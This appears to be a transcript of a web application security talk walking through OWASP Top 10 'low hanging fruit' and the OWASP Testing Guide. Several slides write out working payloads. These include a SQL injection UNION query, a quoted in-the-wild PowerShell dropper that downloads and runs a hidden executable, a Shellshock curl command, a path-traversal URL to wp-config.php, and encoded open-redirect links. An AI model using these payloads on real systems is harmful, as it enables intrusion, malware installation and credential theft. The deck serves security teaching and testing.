Web Application Security and OWASP Testing Guide

Ammarit Thongthua, CISSP CISM GXPN

Transcript of the slide deck "Web Application Security and OWASP Testing Guide"

# Who am I

• Risk Advisory Manager (Deloitte)

• Penetration Tester

• Security Consultant

Web Security?

Where are our system's weak points?

Operating System

Web Server

Database

Framework / CMS

Web Application / Web Service

Plug-in

Attack Surfaces

OWASP Top 10

Vulnerability

Low Hanging Fruit

Injection

Low Hanging Fruits

• Injection

• SQL injection

1/1/1 UNION SELECT 1,username,password,4 FROM USERS;--

Low Hanging Fruits

• SQL injection

• LDAP injection

• XPATH injection

• Command injection

• Code injection

• Ex:

• AJAX

• JSON ***

Low Hanging Fruits

Example of an injected command seen in the wild: a PowerShell one-liner that stops competing processes, downloads a dd binary and an image, carves an executable out of the image with dd, and runs it.

powershell "Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;
(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');
(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-297435.jpg','favicon.jpg');
(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');
Start-Sleep -s 10;(New-Object -com Shell.Application).ShellExecute('svchost.exe');"

Low Hanging Fruits

http://www.victim.com?cmd=

Command injection

Low Hanging Fruits

• Directory Listing

Low Hanging Fruits

• XSS

Just a pop-up?

Low Hanging Fruits

• Insecure Direct Object Reference

Low Hanging Fruits

• Local/Remote File Inclusion

Low Hanging Fruits

• Directory traversal

Low Hanging Fruits

• Missing Function Level Access Control

Weak Credentials

Low Hanging Fruits

Malicious File Upload


Low Hanging Fruits

- HTTP PUT

- File upload feature

- Weak CMS admin password

- Platform vulnerability

- RCE

- Authentication bypass

- Log file + LFI

Inappropriate password handling


Low Hanging Fruits

• Temp file / backup test trick

– Path + .zip, .rar, .bak

– Ex: /admin

• http://testsite.com/admin.zip

• http://testsite.com/admin.rar

• http://testsite.com/admin.bak

Low Hanging Fruits

• With Dirbuster

Low Hanging Fruits

• Autocomplete


Low Hanging Fruits

Sensitive Information Leakage: Misconfiguration (ex: info.php)

Low Hanging Fruits

Sensitive Information Leakage : Error Message


Low Hanging Fruits

Ref: https://securenetworkmanagement.com/shellshock-simple-user-agent-exploit/

Using Components with Known Vulnerabilities

Shellshock

curl "http://cgi-bin/service/index.cgi" --insecure -H "User-Agent: () { :; }; /bin/bash -c 'ping 192.168.30.54 -c 10'"

Low Hanging Fruits

• IIS

https://www.youtube.com/watch?v=vw4JFKZ3lS0

MS15-034: Vulnerability in HTTP.sys Could Allow RCE (CVE-2015-1635)

Using Components with Known Vulnerabilities


Low Hanging Fruits

http://blog.trendmicro.com/trendlabs-security-intelligence/iis-at-risk-an-in-depth-look-into-cve-2015-1635/

• IIS

MS15-034: Vulnerability in HTTP.sys Could Allow RCE (CVE-2015-1635)

Information leakage

Using Components with Known Vulnerabilities

Low Hanging Fruits

• OpenSSL

Heartbleed (CVE-2014-0160)

• Abuses the SSL/TLS Heartbeat extension to read extra data from server memory.

• Affects email, instant messaging (IM), VPN and web services.

• OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable.

http://heartbleed.com/

Using Components with Known Vulnerabilities

Low Hanging Fruits

https://www.baagames.com/2014/04/steam-heartbreed/

Using Components with Known Vulnerabilities

Low Hanging Fruits

Operating System

Database

Framework / CMS

Web Application / Web Service

Plug-in

Web Server Platform

CMS + Database management web

Components

Using Components with Known Vulnerabilities

Low Hanging Fruits


https://www.youtube.com/watch?v=zSva2UPwKvo

Anon Joker

Using Components with Known Vulnerabilities

Low Hanging Fruits


http://the.victim.com/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php

Connect to Database

Using Components with Known Vulnerabilities

Low Hanging Fruits

Unvalidated Redirects and Forwards

Low Hanging Fruits

https://your.bank.com/?url=http://hacker.site.com

Unvalidated Redirects and Forwards

Low Hanging Fruits

https://your.bank.com/?url=%68%74%74%70%3a%2f%2f%68%61%63%6b%65%72%2e%73%69%74%65%2e%63%6f%6d

Unvalidated Redirects and Forwards

Low Hanging Fruits

Testing for Client Side URL Redirect (OTG-CLIENT-004)

Unvalidated Redirects and Forwards

Low Hanging Fruits


../../ /

Unvalidated Redirects and Forwards

Low Hanging Fruits

https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools

• Automatic Scan

Low Hanging Fruits


Unfortunately, 20% of vulnerabilities cannot be discovered by tools

• Some type of insecure direct object references

• Missing function level access control

• Business logic

– Step/Flow

– Stage

– Limit

Vulnerabilities that cannot be discovered by tools

OWASP Top 10

Penetration Testing

TOR / RFP?

Test to cover “Beyond Low Hanging Fruits”

https://www.owasp.org/images/1/19/OTGv4.pdf

OWASP Testing Guide

Information Gathering

Configuration and Deployment Management Testing

Identity Management Testing

Authentication Testing

Authorization Testing

Session Management Testing

Input Validation Testing

Testing for Error Handling

Testing for Weak Cryptography

Business Logic Testing

Client Side Testing

OWASP Testing Guide


Weak Cipher suite

OWASP Testing Guide

[SSL Labs grade screenshots: tested sites rated A+, A and B; tested on 21 August 2016]

Weak Cipher suite

OWASP Testing Guide

https://www.ssllabs.com/ssltest/
